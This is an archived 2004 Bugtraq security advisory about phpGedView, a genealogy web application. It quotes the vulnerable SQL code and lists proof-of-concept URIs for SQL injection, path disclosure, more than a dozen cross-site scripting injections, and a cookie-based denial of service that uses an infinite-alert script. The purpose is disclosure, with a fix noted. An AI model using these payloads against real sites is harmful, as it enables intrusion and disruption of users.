lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040112225404.14979.qmail@www.securityfocus.com>
Date: 12 Jan 2004 22:54:04 -0000
From: JeiAr <security@...ftech.org>
To: bugtraq@...urityfocus.com
Subject: More phpGedView Vulnerabilities




Vendor  : phpGedView
URL     : http://phpgedview.sourceforge.net
Version : 2.65 beta 5 > All Versions(??)
Risk    : Multiple Vulnerabilities



Description:
The phpGedView project parses GEDCOM 5.5 genealogy files and displays them on the 
Internet in a format similar to PAF. All it requires to run is a php enabled web 
server and a gedcom file. It is easily customizable for use on many different web 
sites. It is one of the top 10 most popular projects at SourceForge.



SQL Injection Vulnerability:
phpGedView has a few files which are vulnerable to SQL injection. The vulnerable
files are "timeline.php" and "placelist.php" The vulnerabilities are a result of
input not being properly validated. The data given to these scripts are then executed
by the "functions_mysql.php" file. As we can see below the $parent_id variable as
well as the $level variable is passed directly into the query without being 
sanitized by the script at all in the "get_place_list()" function.

-----[ Begin Code ] -----------------------------------------------------------------

//-- find all of the places
function get_place_list() {
	global $numfound, $j, $level, $parent, $found;
	global $GEDCOM, $TBLPREFIX, $placelist, $positions;

	// --- find all of the place in the file
	if ($level==0) $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=0 
	AND p_file='$GEDCOM' ORDER BY p_place";
	else {
		$psql = "SELECT p_id FROM ".$TBLPREFIX."places WHERE p_level=".($level-1)
		." AND p_place LIKE '".$parent[$level-1]."' AND p_file='$GEDCOM' ORDER BY 
		p_place";
		$res = dbquery($psql);
		$row = mysql_fetch_row($res);
		$parent_id = $row[0];
		$sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=$level AND 
		p_parent_id=$parent_id AND p_file='$GEDCOM' ORDER BY p_place";
	}
	$res = dbquery($sql);
	while ($row = mysql_fetch_row($res)) {
		$placelist[] = stripslashes($row[0]);
		$numfound++;
	}
}

-------------------------------------------------------------------------------------

Below are some URI's which can be used to exploit the issue explained in the paragraph 
above. Also included is a URI that triggers a somewhat similar SQL vulnerability in the
"timeline.php" script.

/placelist.php?level=1[Evil_Query]
/placelist.php?level=1&parent[0]=[Evil_Query]
/placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
/timeline.php?pids=[Evil_Query]



Path Disclosure Vulnerability:
There are a decent number of ways an attacker could disclose the full path of the web 
server, thus aiding in the information gathering process preceding an attack. Below are 
a list of the vulnerable scripts and proof of concept URI's to reproduce the condition.

/indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[Blah]=
/clippings.php?action=add&id=Blah
/login.php?action=login
/login.php?&changelanguage=yes&NEWLANGUAGE=Blah
/gdbi.php?action=connect&username=Blah



Cross Site Scripting:
I have found over a dozen instances of Cross Site Scripting in phpGedView, but there is 
probably more. The impact of these vulnerabilities are self explanatory; they allow code 
execution in the context of the browser of someone viewing the malicious URI. Below are 
examples of the numerous XSS vulns.

/descendancy.php?pid=<iframe>
/index.php?rootid="><iframe>
/individual.php?pid="><iframe>
/login.php?url=/index.php?GEDCOM="><iframe>
/relationship.php?path_to_find="><iframe>
/relationship.php?path_to_find=0&pid1="><iframe>
/relationship.php?path_to_find=0&pid1=&pid2="><iframe>
/source.php?sid=<iframe>
/imageview.php?filename=<iframe>
/calendar.php?action=today&day=1&month=jan&year="><iframe>
/calendar.php?action=today&day=1&month=<iframe>
/calendar.php?action=today&day=<iframe>
/gedrecord.php?pid=<iframe>
/login.php?action=login&username="><iframe>
/login.php?&changelanguage=yes&NEWLANGUAGE=<iframe>
/gdbi_interface.php?action=delete&pid=<iframe>



Denial Of Service:
It is also possible for an attacker to launch a DoS of sorts against a user who visits a 
certain URI. The vulnerability is in the language variable not being properly validated. 
If an attacker sends the following URI to a victim, they will not be able to access the 
phpGedView web site until they either clear their cookies, or manually reset the language 
settings by typing in a valid URI to reset the language back to something acceptable. The
phpGedView website will not be able to be viewed by the victim until then.

/login.php?&changelanguage=yes&NEWLANGUAGE=[Junk_Here]

Or even one hundred million times more annoying is this :P

/index.php?&changelanguage=yes&NEWLANGUAGE=&lt;script&gt;var i=1; while(i){alert(i);};&lt;/script&gt;

As I mentioned before though, it is possible to regain a normal session by manually typing 
in a value in the language variable that is acceptable to phpGedView. 



Solution:
These vulnerabilities have been addressed in the latest beta release. Users may obtain the
latest beta version at http://sourceforge.net/project/showfiles.php?group_id=55456



Credits:
Credits go to JeiAr of the GulfTech Security Research Team.
http://www.gulftech.org


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ